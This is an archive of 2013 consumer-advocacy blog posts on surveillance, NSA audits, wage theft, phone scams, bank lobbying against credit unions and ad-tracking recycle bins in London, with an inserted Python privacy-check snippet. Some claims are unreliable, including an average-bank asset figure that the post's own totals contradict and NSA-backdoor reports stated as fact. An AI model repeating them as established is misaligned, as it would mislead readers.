
19 posts from August 2013

Are You Walking Blindly In The 'Big Data' Revolution?

There is a good article on the BBC News website about the trends and impacts of technology -- namely, about how "big data" is transforming the entire planet. "Big data" refers to the information that companies and governments collect about consumers. They collect this information from a variety of sources:

"... not only from posts to social media sites, mobile signals and purchase transactions but increasingly from sensors on objects from lamp-posts to skyscrapers...In Birmingham, lamp-posts are being fitted with sensors that can transmit information about cloud cover to offer hyper-local weather forecasting. In Norway, more than 40,000 bus stops are tweeting, allowing passengers to leave messages about their experiences... At MIT's Senseable City Lab, 5,000 pieces of rubbish in Seattle were geo-tagged and tracked around the country for three months to find out whether recycling was really efficient..."

You've probably noticed video surveillance cameras on street lights across the country. That's another source. This blog has reported on many other sources:

All of these types of devices will be used more and more in what people call a "smart city:"

"The core functionality of a smart city requires a vast amount data to be collected on every aspect of our lives every minute of every day. The question is how does that data get used? And it doesn't require a huge amount of imagination to see how it could be used to monitor people... the control of information is being taken away from citizens, and companies providing services are rushing to find ways of generating revenue from the data they hold. The danger is... individuals will not be able to control the ways they are monitored or what happens to the information, which is exactly the opposite of how it should be."

It seems to me that you can distill all of this into a single issue for consumers:

"... People have clicked "yes" to those terms but don't realise that everything you share can be collected. We could be walking blindly into a 24/7 surveillance society..."

We have traded privacy for convenience.

Are you walking blindly? Are you willing to continue trading convenience for privacy? Are you willing to question online processes, privacy disclosures, and website terms of usage? Are you willing to push back and say: enough? Are you willing to demand that your elected officials place consumer protections before privacy abuses happen, and not minor, ineffective protections afterwards? Are you willing to support any of the consumer advocacy groups that look out for your privacy?


Wage Abuse: A New I've Been Mugged Topic

It seems that an increasing number of employees (and independent contractors, also known as "freelancers") aren't paid the wages they've earned, or receive only a portion of them. And, in some instances, employers haven't deposited contributions to employee retirement plans in full or in a timely fashion.

So, I have added a new topic in the tag cloud in the near right column for this content. The "Wage Abuse" topic includes content where we will explore the various ways employers abuse employees or steal from employees regarding wages. The issues cover employers in both the public and private sectors. The news items are often reported by news media, consumer advocates, or labor agencies (federal, state).

I hope that you like the new category.


More Consequences From Broad NSA Surveillance: German Government Technologists Consider Windows 8 Too Dangerous

Apparently, surveillance code written by the National Security Agency (NSA) is in the new version of Windows 8. BGR reported:

"German publication Zeit Online has obtained leaked documents that purportedly show that IT experts within the German government believe that Windows 8 contains back doors that the NSA could use to remotely control any computers that have it installed.... Zeit says that German researchers fear that there will be “simply no way to tell what exactly Microsoft does to their system through remote updates..."

From prior news reports we learned that during the last decade Microsoft Windows 95, Windows 98, Windows NT4 and Windows 2000 all contained NSA code. Now, we learn that Windows 8 also includes NSA code. The Android OS includes NSA code, while, according to Apple, its operating system software and products do not contain NSA code. (Let's hope that is true. The U.S. does have a secret court, secret laws, and secret processes -- so Apple may be prevented from admitting what is in its OS.)

If the report about Windows 8 is true, this may cast a different light on the departure of Microsoft CEO Steve Ballmer. I see several possible scenarios:

  1. Microsoft approved the NSA code with Ballmer involved in the decision
  2. Microsoft approved the NSA code without Ballmer involved in the decision
  3. After fighting the NSA surveillance program, Microsoft was forced to include NSA code in its products
  4. Microsoft included the NSA code without fighting the government surveillance program

It's not good if Ballmer approved the decision to include NSA code in Windows 8, and it's not good if he wasn't involved -- with some junior-level engineer instead making such a pivotal decision. It's not good if Microsoft never fought the inclusion of NSA code while being forced to comply. I'd like to believe that company executives could foresee a negative reaction if and when customers realize that the NSA is in the company's software and products.

Reportedly, Yahoo fought the government surveillance program and lost in 2007 or 2008. I am not a lawyer. Perhaps, some legal expert will weigh in here about whether the U.S. government can use the FISA Amendments Act (FAA; Adobe PDF) to force companies to comply with government surveillance programs. We have a secret court, secret laws, and secret processes. So, it is possible there is some secret law besides the FAA.

The embedded NSA code puts Microsoft products at a disadvantage versus Apple, since Apple products and operating system software do not include NSA code. And, the loss of business in Germany is not good news, as Microsoft struggles with lagging market share with smart phones, Microsoft Office faces stiffer competition, and Windows 8 sales lag as PC sales lag.

The situation makes me wonder how much money the NSA paid Microsoft to embed their code. I doubt that any payments to Microsoft equal or exceed lost company revenues. In fact, the Guardian UK reported on Friday that the NSA has already paid millions to several high-tech companies to cover the companies' compliance costs:

"A Yahoo spokesperson said: "Federal law requires the US government to reimburse providers for costs incurred to respond to compulsory legal process imposed by the government. We have requested reimbursement consistent with this law." Asked about the reimbursement of costs relating to compliance with FISA court certifications, Facebook responded by saying it had "never received any compensation in connection with responding to a government data request." Google did not answer any of the specific questions put to it, and provided only a general statement denying it had joined Prism or any other surveillance program... Microsoft declined to give a response on the record."

If the BGR and Zeit Online news reports are accurate, then the NSA code is not benign, contrary to what the NSA said in prior news reports about its code in the Android operating system software. This is huge news also because it indicates a clear intent by organizations in other countries to stop buying future Microsoft products, which they view as compromised by NSA surveillance.

Prior news reports indicated a review of the Safe Harbor agreement that allows U.S. companies to sell products and services in the European Union. If amended, that would greatly restrict Internet and high-tech companies' sales in Europe. That consequence is in addition to warnings by experts that the massive NSA government spying program could cost U.S.-based cloud-services vendors $35 billion in lost revenues. In simpler terms:

Lost revenues by U.S. high-tech companies = lost American jobs = lost tax revenues to U.S. federal, state, and local governments

Consequences just got real. For everyone. Not just for Microsoft.

A tiny bit of somewhat good news in the BGR report:

"... the researchers say that they'll still be able to use Windows 7 securely 'until 2020...'"

That gives the U.S. and its high-tech firms a small window to restore customers' confidence in their products and services with embedded NSA surveillance code, plus embedded code from any other U.S. government agencies. Ballmer may need to leave far sooner than 12 months. Maybe some more NSA document disclosures will shed light on this.

Do U.S. government officials really believe that there would not be any negative (unintended) consequences for its extensive surveillance programs with NSA code embedded in commercial software products and services? Do U.S. government officials really believe that there would not be any negative consequences for mass surveillance of our European allies? It has undermined our allies' trust in the USA. It has undermined their trust in USA-made products and services.

The American people need to have a full debate about this. Do taxpayers (and voters) want their government spending money this way in surveillance programs and software code? Do you find it acceptable that this code is done in secret? Do you find acceptable the projected revenue losses by American high-tech companies? Are the likely job losses acceptable, too? What other high-tech companies will be affected next?


Fraudsters Target Residents In Several States With Utility Scam

Earlier this month, Rhode Island residents were warned about a utility scam where fraudsters try to trick them into disclosing sensitive bank account information. The fraudsters pretend to be representatives from your local utility provider; in Rhode Island, National Grid.

During the phone call, the fraudsters claim that the customer's account is past due, and that their electric or gas utilities will be shut off unless they pay immediately by providing their bank account and payment information over the phone. Besides Rhode Island, the fraudsters have targeted consumers in Pennsylvania, Maryland, Ohio, Florida, and Alabama. In Florida, the fraudsters demanded payment via the Green Dot prepaid card.

National Grid does not contact Rhode Island customers by phone about past due account notices. If you receive a phone call with this scam, or were affected:

  • Do not give out bank account and payment information over the phone,
  • Do not wire money to people you do not know,
  • Do not give prepaid cards to people you do not know,
  • Report the scam to the Federal Trade Commission (FTC), and
  • Contact your utility provider directly about your account status.

When A Movie Ticket Costs $50 -- And That Doesn't Include Soda

[Editor's Note: today's post is by guest author R. Michelle Green, the Principal for her company, Client Solutions. She is a combination geek girl, personal organizer, and career coach. Michelle helps others improve their use of technology in their personal or professional life. Today, she discusses the trend by more companies to charge for their products and services with dynamic pricing techniques.]

By R. Michelle Green

I find great joy in large dark rooms experiencing a well-told story on a big screen. Knowing this, I tend to buy my movie tickets in bulk (AAA pays for itself chez moi...) So I’ve been insulated from the shift in movie pricing these last 2-5 years. Sure I noticed that some theaters had stepped beyond time of day pricing, or that my coupons are no good during the movie’s first week. Some theaters charge more for special events, like the Metropolitan Opera in HD, the 50th anniversary of Lawrence of Arabia, or ST:NG’s 25th anniversary. But a recent conversation on utility pricing struck a chord in me, having just read an article about the $50 movie ticket.

The Hell you say? Oh it’s already happened, a trial balloon less than two weeks ago. In five US cities, $50 bought a ticket to an advance showing of World War Z, a poster, a digital download of the movie, and (drum roll please) – a small popcorn. (jeez Louise, not even a medium???) At a USC panel, Lucas and Spielberg recently said they expect $100 tickets in the near future; that art house and ‘personal’ films could be priced at $7 while the big event movie on the first night might be $100. China has a tiered system of government controlled prices for movies – Iron Man 3 sold out at as much as $25 in some locations. This isn’t a new thought, particularly for economists.

Once you start looking, you see à la carte pricing everywhere. Even some of the major airlines now charge not for picking the desirable seat, but for exercising the right to choose one at all (even the middle seat). Spirit Airlines has gone plumb crazy IMNSVHO – advertising incredibly cheap fares ($7-25) but then charging you for your carry-on (a gendered price burden, as a woman's purse would be considered the first or free bag). Oh, and don't procrastinate – they'll charge you $45 extra if you decide you want a carry-on at the gate, and not at the time of online ticket purchase. Airline ancillary revenue is the cash cow now, not flight pricing.

A restaurant I frequent has new management wringing every penny out of the process. Ever gotten take out and decided to sit down and eat it there? They’ll charge you an additional fee to put it on a plate. In a party of three and want to use three credit cards? Not so fast: costs extra to use more than 2 cards.

So what does à la carte pricing for movies look like in practice? Do you know the movie's title, time of day, day of week, day of 1st showing, version, format? And where are you, how old are you, do you want concierge service? But caveat emptor, right? If the price structure and rules are visible, available before sale, clear, and comprehensible, do I have the right to bitch? I'm here 5 minutes before the movie begins. I'm psyched for the show, my money's in hand. NOW I learn that noon isn't matinee pricing anymore AND this is the 3D presentation AND it's in the deluxe room (where you have to choose a seat and the ushers are also waitstaff). So now my expected $7.50 ticket is maybe $15. At least I knew what the price could have been, and knew what variables could lower the price. The woman in front of me just paid the $15…

Dinner and a movie? Be sure to allow 15 minutes to find and read your menu’s fine print...


Washington Post: NSA Violated Citizens' Privacy Repeatedly

Like most people, you have probably been away on vacation or at the beach enjoying the warm summer weather. Last week, the Washington Post reported some very interesting and troubling news.

The newspaper reported about an internal audit by the National Security Agency (NSA), where the NSA violated consumers' privacy thousands of times while performing surveillance of foreign targets in the United States. The audit covered the period from April 2011 through March 2012. The newspaper obtained the document from former NSA contractor Edward Snowden.

In plain English, this means that the NSA collected data about U.S. citizens it shouldn't have collected data about. That is a violation of the Fourth Amendment of the U.S. Constitution.

Some of the violations were serious. Defenders of the NSA were quick to point out that many of the violations were supposedly minor typographic errors:

"In one instance, the NSA decided that it need not report the unintended surveillance of Americans. A notable example in 2008 was the interception of a “large number” of calls placed from Washington when a programming error confused the U.S. area code 202 for 20, the international dialing code for Egypt... In another case, the Foreign Intelligence Surveillance Court, which has authority over some NSA operations, did not learn about a new collection method until it had been in operation for many months. The court ruled it unconstitutional."

When defenders of the NSA claim that typographical errors are minor, to me that is dishonest. The Fourth Amendment of the Constitution is the issue here, however it was violated. Data was collected about U.S. citizens that should not have been collected. Period. You don't get credit for good intentions, or for "oops, we didn't really mean to collect that." All violations are intrusive.

This highlights the problem when there are secret courts, secret laws, secret operations, and either insufficient or incompetent oversight by the U.S. Congress. Privacy is breached, the violations are never corrected, and things get a lot worse. A related Washington Post article about the FISA Court reported:

"The chief judge of the Foreign Intelligence Surveillance Court said the court lacks the tools to independently verify how often the government’s surveillance breaks the court’s rules that aim to protect Americans’ privacy. Without taking drastic steps, it also cannot check the veracity of the government’s assertions that the violations its staff members report are unintentional mistakes."

So, things are worse. I cannot over-emphasize the importance for citizens -- voters -- to read the Washington Post article with comments by U.S. District Judge Reggie B. Walton. Kudos to the Washington Post for this excellent reporting.

The Washington Post website contains several detailed articles, including a redacted executive summary of the internal NSA audit. And based on the training the NSA gives its analysts, the explanations and spy language are intended to downplay the privacy violations, obfuscate the truth, and mislead Congress:

"This document tells NSA analysts how to explain their targeting decisions without giving "extraneous information" to "our FAA overseers." Analysts are specifically warned that they "MUST NOT" provide the evidence on which they base their "reasonable articulable suspicion" that a target will produce valid foreign intelligence. They are also forbidden to disclose the "selectors," or search terms, they plan to use. In examples that draw on actual searches, the document shows how to strip out details and substitute generic descriptions."

Geez. Is it so hard to simply tell the truth? At this point, my trust level for the NSA is zero. Whatever trust I had in the FISA Court is declining fast.

When I think back over the last 10 weeks, it seems like one lie after another, followed by one disclosure after another. The CrunchGov blog summed up the recent history well:

"It’s just metadata. It’s just metadata on all phone calls. No they can’t call up your emails. Well, yes, XKeyscore is real, and you should be happy we have it. No, there have been zero privacy abuses. Well, fine, in one 12-month period ending in 2012 there were 2,776, but that’s just proof of oversight and none were willful! Wrong. And no, there has been no harm to individuals. We should worry more about terrorism."

No harm? We have heard that the NSA shares the data it has collected with other government agencies, who then use it for their own investigations without disclosing where they got it from. This makes it difficult (or impossible) for people to defend themselves in court proceedings. That is harm. We've heard about one e-mail service shutting down, and one blog shutting down so far; in addition to forecasted revenue losses in the cloud industry. Lost revenue equals lost jobs. That harm is spreading.

So, not only do we have a secret court, secret laws, and secret operations, but the court that is supposed to oversee all of this doesn't have the resources to do the job. Hence, it cannot verify the allegations about the privacy violations. The privacy violations could be a lot worse, and/or more frequent. And, the U.S. Congress seems okay with this mess.

So, we essentially have big government spying run amok. The acronym FUBAR comes immediately to my mind. If this bothers you (and I sincerely hope that it does), write to your elected officials today.


Credit Unions Outperform Banks On Customer Loyalty, And Banks Lobby To End Credit Unions' Tax-Exempt Status

The Bankrate Banking blog reported the results from a recent survey about customer loyalty:

"According to the 2013-2014 National Member and Nonmember Survey from the Credit Union National Association, 57 percent of credit union members indicate they are extremely likely to recommend their credit union to friends. In contrast, just 40 percent of members who also use banks say they're equally as likely to recommend that institution to friends."

A 2012 survey found that 11% of customers were ready to leave their bank. To improve their performance, you'd think that banks would focus on better customer service, and cut costs to improve profitability. Instead, the big banks have focused on lobbying legislators in Washington to end the tax-exempt status of credit unions, which are non-profits:

"... Frank Keating, president of the American Bankers Association (ABA), wrote: 'Many tax-exempt credit unions have morphed from serving "people of small means" to become full-service, financially sophisticated institutions. The time has come to abolish this exemption.'"

Another claim the banking industry likes to make is that repealing the credit unions' tax exemption would create a level playing field. Earlier this year, the American Bankers Association trade group released a flyer (Adobe PDF) which claimed:

"Today credit unions are a $1 trillion industry that pays no income tax. That’s nearly $2 BILLION every year that could help shrink the federal deficit. Now, credit unions want even more perks. It’s time to end credit unions’ indefensible and outdated special treatment. Enough is enough."

I agree. Enough is enough. And, enough with the spin and misleading statements. Let's start with some facts from the U.S. Statistical Abstract:

  • The average bank is about 14 times larger than the average credit union. In 2010, the average bank had $1,739.7 billion (or $1.7 trillion) in assets while the average credit union had $124.6 billion in assets.
  • Banks still control a whopping 94% of the market, based on assets. In 2010, FDIC-insured banks (commercial and savings) had over $13.3 trillion in assets, compared to $914 billion in assets at credit unions (federal- and state-insured).
  • Banks are far bigger with more branch offices and ATM retail booths. Also in 2010, the 7,657 FDIC-insured banks (commercial banks and savings institutions) had 95,527 offices (main office and branches). That is about 12 offices per institution. In the same year, there were 7,339 credit unions; most with a couple offices (that rely on others' ATM networks to service their members).
  • In 1990, the average bank was about 20 times larger than the average credit union. In 1990, the average bank had $306.6 billion in assets while the average credit union had $15 billion in assets.
  • From 1990 to 2010, the number of banks decreased (e.g., consolidations, failures) by about 50%, the number of offices increased by 45%, and assets increased 186%. So, the big banks got a lot bigger.
  • During the same period, the number of credit unions decreased (e.g., consolidations, failures) by about 43%, and assets increased by 361%. So, small organizations did get bigger.
  • In 1990, banks controlled about 96% of the market, based on assets. So, credit unions have captured 2% of the market in 20 years. That is minuscule annual growth in market share.

Some additional facts worth noting:

The trade group representing credit unions has completed its own analysis which totally debunks the level playing field claim by banks. Read this 2011 report: Commercial Banks and Credit Unions: Facts, Fallacies, and Recent Trends:

  • The claims by bankers imply that credit unions have captured a larger share of the market. This is false. In 1992, credit unions had 6% of the market -- the same share as in 2010.
  • In 2011, half of credit unions had less than $19 million in assets while less than 2% of commercial banks were this small. During the same period, two-thirds of banks had $100 million or more in assets, while only 20% of credit unions were this big.
  • The claim by bankers that credit unions don't pay their fair share of taxes is misleading and dishonest. Many banks use the SubS tax status to pay less in taxes. According to CUNA, the number of banks using the SubS tax status has grown from 6% in 1997 to 31% in 2011. Both small and big banks use this tax dodge. Again in 2011, 61 banks with $1 billion or more in assets used the SubS lower-tax status, which was originally created for small businesses. It would seem that the banks are gaming the system tax-wise.

What's really going on here? I began to wonder why an industry that controls 94% of the market would complain about its competition.

As I see it, this lobbying by banks is another slick attempt to focus attention away from themselves and to limit consumer freedoms and banking choices. By limiting or eliminating choices (e.g., credit unions), banks reduce the competition that keeps banking prices down. Without credit unions, it would be easier for banks to raise prices (e.g., raise fees and loan interest rates, decrease savings interest rates). Consumers would not have an option to move their money away from banks. I can think of no other reason why an industry would complain about competition that has only 6% of the market.

Remember, raising prices was what the banks wanted to do in 2011, but couldn't when consumers rejected higher monthly checking and debit fees proposed by the Bank of America and other big banks. Raising banking prices has several benefits for banks:

  1. Increases banks' revenues and profits
  2. Encourages some current account-holders to move to underbanked status: a checking or a savings account, but not both
  3. Encourages some current account-holders to move to unbanked status: neither a checking nor a savings account
  4. Allows banks to service both underbanked and unbanked customers with highly-profitable prepaid cards, instead of with traditional checking and savings accounts. Prepaid cards aren't as tightly regulated as debit cards, credit cards, checking accounts, and savings accounts. Prepaid cards have fewer or no disclosure requirements and few to no limits on the number or amount of fees the banks can charge. Prepaid card users have greater liability should the bank that issued their prepaid card fail.

In 2011, about 8% of U.S. households were unbanked and 20% were underbanked. The average prepaid card charges about $300 per year in basic fees. That's a huge revenue source for banks. Do you want to pay $300 per year, or more, in banking fees? I doubt it. I don't.

This blog discussed the long list of fees charged on many prepaid payroll cards. The goal should be to decrease unbanked and underbanked households. The St. Louis Federal Reserve said it well in 2010:

"Encouraging the unbanked to handle payments through the financial mainstream is important for a number of reasons. Having a checking and savings account is an important first step in establishing that the consumer has the financial acumen to apply for credit for a car or home... the key advantage to consumers having bank accounts is avoiding costly alternative financial services and enabling families to build and protect their wealth. Unbanked consumers spend approximately 2.5 to 3 percent of a government benefits check and between 4 percent and 5 percent of payroll check just to cash them. Additional dollars are spent to purchase money orders to pay routine monthly expenses. When you consider the cost for cashing a bi-weekly payroll check and buying about six money orders each month, a household with a net income of $20,000 may pay as much as $1,200 annually for alternative service fees—substantially more than the expense of a monthly checking account fee."

So, traditional checking and savings accounts are ways for consumers (e.g., the poor and lower middle-income people) to move up the economic ladder in society to achieve the American dream. If one wants the poor and middle-income classes to succeed, one should encourage them to open traditional checking and savings accounts with the lowest-cost financial products possible, usually available at credit unions.

Without credit unions (or with severely hampered credit unions), a rise in banking prices by banks would likely result and cost consumers dearly. The Los Angeles Times reported:

"The tax exemption is crucial to credit unions, which by law can't raise capital through public stock offerings the way that banks can, said Fred R. Becker Jr., president of the National Assn. of Federal Credit Unions, a trade group with about 3,800 federally chartered members... A 2012 economic study commissioned by the trade group found that removing the tax exemption would cost consumers about $10 billion a year through higher fees and interest rates on loans, as well as lower interest rates on savings."

The Los Angeles Times article also provided some good background information:

"Under a 1934 law, Congress exempted credit unions from federal income taxes as long as they were nonprofit businesses, organized without capital stock and operated for the benefit of their members. For decades, most credit unions were small operations, usually serving employees of individual businesses and government agencies. The industry has grown significantly since the 2008 financial crisis, boosted by outrage over Bank of America's 2011 plan to impose a $5 monthly fee for debit card use."

So, the big banks have only themselves to blame for the rise in credit unions. I think that it is important to remember the history of banks and credit unions described in this Federal Credit Union handbook (Adobe PDF):

"In the early twentieth century, credit needs of the urban working classes in the United States were largely neglected by established financial institutions. For the most part, the average worker had nowhere to turn except to the usurious money lenders of the day. This growing dependency complicated the economic life of the average consumer and gave rise to the development and formation of a cooperative credit system in the United States, an idea originating in Europe and imported to North America in 1900. In 1908, the first legally chartered cooperative credit society was established in Manchester, New Hampshire by a special act of the state’s legislature. The following year, the first complete credit union act, the Massachusetts Credit Union Act, became law in Massachusetts. By 1933, enactment of state laws permitting formation of credit unions had been largely accomplished. In 1934, the Federal Credit Union Act was signed into law..."

A reminder: usurious = very high or unlimited interest rates. So, a world without credit unions would eliminate the need for the Credit Union Act. It would also eliminate several freedoms citizens have, including the right to gather as a group and form a credit union. It would also set conditions for a return to the high interest-rate times of the 1800s. Do you want to return to the banking practices of the 1800s? I doubt it. I don't.

What to do next. First, contact your elected officials and tell them what you think of the banks' lobbying against the tax-exempt status of credit unions. Second, move your money to a local, community bank or to a credit union. Third, join the Don't Tax My Credit Union movement.


Video: Wet Wipes For Incontinent Bankers

Earlier this week, the Keiser Report posted this YouTube video with a comparison, which I distilled into the following formula:

Wet wipes + food waste fats = giant fatberg in London sewer = fraud + Libor scandal + TBTF + derivatives + unethical bankers

Well, Western bankers certainly deserve this criticism. You can read about the reasons why in the banking section of this blog. While this comparison is pretty funny, what isn't funny is that a viewer or reader probably can't rely on RT (Russia Today) News to deliver consistently balanced news. Will Russia Today criticize, when appropriate, the Kremlin? Will it present news about harsh anti-gay laws in Russia? Will it report instances of persistent and violent racism in Russia? Will it report news about the assassination of journalists? I highly doubt it.


What To Do When You Receive Spam Phone Calls

A few weekends ago, a friend posted this message on a social networking website:

"So, at 8:30 this morning, I'm sound asleep, I get a phone call from 214-814-5094, and it's this guy with a *heavy* accent who tells me he's calling from the State Attorney's office and there are "three judgments" against me. I responded with something rude, it's 8:30, I was asleep, it's Saturday, he says, "Please don't use that language with me, ma'am!" and I said, "You woke me up, get used to it!" And he asked for my attorney's name and I asked, "What state? What attorney? I doubt the State Attorney is calling me on a holiday weekend, and seriously doubt he's using a call center in India!" Then I went and Googled the number - and there are PAGES of complaints about the number!"

My friend was wise and rightly suspicious of this caller. My advice:

  • Hang up on callers like this. Don't engage them.
  • Don't disclose any personal information, even if it seems like the caller knows data about you.
  • Assuming your phone number is on the Do Not Call list, file a complaint with both your phone company and the Federal Communications Commission (FCC). My friend filed a complaint.
  • If your phone number is not on the Do Not Call list, consider adding it.

Contractor To Pay $600,000 To Settle Wage Theft Investigation In New York City

Last week, the office of the New York State Attorney General announced the results of an investigation into Masonry Services, Inc. (MSI), a masonry contractor. MSI has agreed to pay $600,000 for underpaying workers on an affordable housing project within New York City.

MSI owners James S. Herrera and Jaime T. Herrera have agreed to pay $600,000 for underpaying masonry workers on the St. Marks Project, a publicly funded affordable housing project for seniors in the Brownsville section of the borough of Brooklyn. The payment includes $575,000 in back wages plus $25,000 in costs. New York State Attorney General (AG) Eric T. Schneiderman said:

“My office will continue to pursue contractors who illegally underpay workers, whether it’s on a small scale or in a larger settlement like this one... Contractors who work on publicly-funded affordable housing projects must comply with all applicable laws, plain and simple. MSI will be held accountable for failing to meet its obligations..."

The investigation focused on the requirement that workers must be paid the prevailing wage. The goal of prevailing wage laws is to ensure that government contractors pay wages that are comparable to the local rates for a given trade. According to the announcement:

"The law requires an hourly rate for construction work performed for public agencies that is well above the state and federal minimum wage of $7.25 per hour, along with certain additional benefits. Between June 2009 and July 2010, the masonry workers on the St. Marks Project were paid between $8 and $23 an hour – well below the applicable prevailing wage rates – and were not paid overtime despite regularly working more than 40 hours a week."

Besides the payment, the agreement also requires MSI to pay for services to independently monitor MSI’s labor practices on private and public construction projects for three years, with unannounced on-site inspections. If violations are found, MSI will be barred for five years from working on New York State public works projects.

Robert Bonanza, business manager of the Mason Tenders District Council, said:

“For too long, too many contractors have operated in open defiance of the prevailing wage laws, which protect workers from unscrupulous employers, whose only goal is to profit at the expense of honest hard-working New Yorkers. On behalf of the members of the Mason Tenders District Council, I want to thank Attorney General Schneiderman and his office for their role in bringing MSI and its owners to justice."

Learn more about the Mason Tenders District Council of New York City and Long Island.


London Company Performs A Market Test Using Recycle Bins That Track Smartphones

Advertisers and companies are getting more aggressive about tracking consumers by using a variety of technologies. An earlier blog post discussed a test in Brazil with grocery store shopping carts outfitted with interactive touch-screen tablet computers. Today's blog post discusses interactive recycle bins that track the smart phones of consumers passing by.

Recycle bins tracking consumers? Really?

Yes. Recycle bins. During the weekend, ComputerWorld reported a market test in London by advertisers using recycle bins to display interactive ads by tracking the smart phones of consumers that pass or walk by the bins:

"The bins display advertising that's customized for each phone tracked... 12 of these bins in London's Square Mile business district were "upgraded" with "Renew ORB" devices, which are designed by a London-based company called Presence Aware to seek out smartphone MAC addresses to identify individual phones. The tracking system determines how close the phone is to the bin, how fast the user is moving, what direction the user is heading and what brand the phone is."

The interactive recycle bins are called "Renew Pods." As you walk by a bin, it serves up an interactive ad based upon the direction you are walking, the date, the time, and any interactive ads you have seen previously. If you walk by several Renew Pods, the company can track -- based upon the unique identifier broadcast by your smart phone -- your travel route and collect more data about all of the ads you've seen, and the stores you have passed. Supposedly, the foot traffic is summarized and made anonymous. All of this tracking provides advertisers, the retail stores participating in the market test, and the advertising network with a lot more information about the consumers who walked or passed by:

  • Which ads were displayed
  • Which ads were displayed repeatedly
  • Direction of walkers/passersby
  • Which bins displayed which ads

Consumers walking or passing by a bin didn't have to enter any of the participating retail stores to see the ads on the sides of the bins. Consumers only had to pass a bin.

Some examples illustrate where the technology and advertising are headed. If you walk past a bin during a spring day towards a shoe store participating in the Renew Pods program, you might see an interactive ad on a recycle bin with summer shoes for sale at that store. If you walk past a bin during the afternoon towards a participating restaurant, you might see an interactive ad about dinner menu items at that restaurant. If you walked past several bins while visiting several dress stores, the bins might display interactive ads about dresses and accessories.

Merely the act of walking past an interactive recycle bin triggers the interactive ads. You didn't have to enter any of the participating retail stores to be tracked and to see ads on the sides of bins.

Creepy, eh?

Science-fiction fans will note that this is one step removed from the "Minority Report" film, where malls display interactive, personalized ads based upon scanning your eyes.

The problems with the Renew Pod program should be obvious. Consumers don't have a choice. Consumers walking by are automatically included, and cannot opt out of the program/tracking. Moreover, the program does not provide consumers with any notice -- privacy or terms-of-use policies -- about the program, the data collected, the extent of the tracking, and whom the data is shared with. Basically, consumers can only trust the CEO's claims about their data remaining anonymous.
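As an added illustration (my own example, not code from Presence Aware, Renew, or the ComputerWorld article), here is a short Python check that a privacy reviewer could run over stored records of the kind described above. The bin names, MAC addresses, sightings, hashing schemes, and the threshold value are all constructed for the example. The point it shows: replacing a MAC address with a hash does not make the foot-traffic data "anonymous" as long as the records still reveal which bins a single device passed, while per-bin, per-hour counts with a minimum-group threshold carry no route at all.

```python
import hashlib
from collections import Counter, defaultdict

# Constructed sightings as a bin operator might log them: (bin_id, hour_of_day, device MAC).
# Eight phones pass bin A at 09:00, three of them also pass bin B, and one reaches bin C at 10:00.
SAMPLE_SIGHTINGS = (
    [("bin-A", 9, "02:00:00:00:00:%02x" % i) for i in range(8)]
    + [("bin-B", 9, "02:00:00:00:00:%02x" % i) for i in range(3)]
    + [("bin-C", 10, "02:00:00:00:00:00")]
)

def stable_pseudonym(mac):
    """Unsalted hash of the MAC: looks anonymous, but every sighting of one phone maps to one value."""
    return hashlib.sha256(mac.encode()).hexdigest()[:12]

def daily_pseudonym(mac, day, secret):
    """Keyed hash that rotates daily (constructed scheme): the same phone cannot be followed from
    one day to the next, though its sightings within a single day remain linkable to each other."""
    return hashlib.sha256(f"{secret}:{day}:{mac}".encode()).hexdigest()[:12]

def pseudonymize(sightings, pseudonym):
    """Replace raw MACs with pseudonyms, as a 'we anonymize the data' implementation might do."""
    return [(bin_id, hour, pseudonym(mac)) for bin_id, hour, mac in sightings]

def linkable_devices(records):
    """Pseudonyms seen at more than one bin. A non-empty result means walking routes can be
    reconstructed from the stored records, whatever the identifiers are called."""
    bins_seen = defaultdict(set)
    for bin_id, _hour, pseud in records:
        bins_seen[pseud].add(bin_id)
    return {p for p, bins in bins_seen.items() if len(bins) > 1}

def aggregate_counts(sightings, k=5):
    """Discard identifiers entirely: keep per-bin, per-hour device counts and drop cells with
    fewer than k devices, which would otherwise single out the few people who passed."""
    counts = Counter((bin_id, hour) for bin_id, hour, _mac in sightings)
    return {cell: n for cell, n in counts.items() if n >= k}
```

Run `linkable_devices` over whatever the operator actually stores: if it returns anything, the "anonymous" claim is about the column name, not the data. Only the aggregated counts answer the question the advertiser says it cares about (how many people passed which bin, when) without keeping a per-person trail.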

In the end, common sense ruled and the city of London stopped the program:

"A spokesman for the City of London Corporation said: "Irrespective of what's technically possible, anything that happens like this on the streets needs to be done carefully, with the backing of an informed public.""

That should be the goal for any company or executives looking to develop a similar program. Keep the public informed. The program should be opt-in, by first asking consumers if they want to participate. And, the appropriate policies (e.g., privacy and terms of use) must be displayed in order for consumers to make an informed choice to participate or not.


Employees Share Their Experiences With Wage Theft

Many employees don't immediately recognize wage theft in the workplace. Perhaps, you (e.g., hourly workers) were asked to work overtime without being paid. Or, maybe you were asked to work off the books. Or, maybe a paycheck or business travel reimbursement check from your employer bounced.

The folks over at Working America asked consumers to share their wage theft stories. Here are a few:

"Once my paycheck bounced because the owner of a security business in California bought a Porsche with the company payroll. They froze my accounts. Checks bounced."

"I had gotten my paycheck on a debit card from work. About a month ago I lost the card – it still had 160 dollars on it. I sent in for a new one; I got one without the money."

"When my husband worked for a supermarket chain at close to minimum wage, it was mandated that he punch out at “quitting time” and then go to the parking lot to round up the shopping carts until every last one was collected – even those for shoppers rung up after closing time."

"As a waitress we had to stay after closing and clean for free. No wages, not even the minimum wage, for waitresses. Vacuuming, washing tables, chairs, sweeping, filling salt and pepper shakers and condiments. As a single mom, I put up with it to keep my job. They knew I needed to work."

To learn more and read more stories by employees, visit the Main Street blog by Working America. You can also read employees' stories on BuzzFeed.


What Is Metadata? Why Is It Important?

You have probably heard the term "metadata" mentioned frequently in reports about government surveillance programs. Or, maybe you have been involved in a class-action lawsuit where a company was alleged to have abused the metadata of its customers.

One way to understand metadata is to look at examples for different types of data. First, metadata about your (cellphone and land-line) telephone calls includes:

  • The phone number you called (reportedly, the name is not collected)
  • When you made the phone call:  date and time
  • Phone number of who called you
  • When you received that call: date and time
  • Your phone number
  • Your phone information (UDID if a mobile device)
  • How long you talked: duration of the call in minutes
  • Where you made/received the phone call (e.g., geo-location of your mobile device)

Mobile devices include cell phones, smart phones, and tablets. Metadata does not include the contents of your telephone calls or conversations: what you said during your phone conversation. Courts have ruled since 1979 that it is legal to collect telephone metadata. They can learn a lot by analyzing the patterns of your phone calls: who, when, and where you make/receive certain calls. They don't have to listen to your actual phone conversations to learn a lot. Analyzing the metadata of your phone calls tells them almost everything they need or want to know.

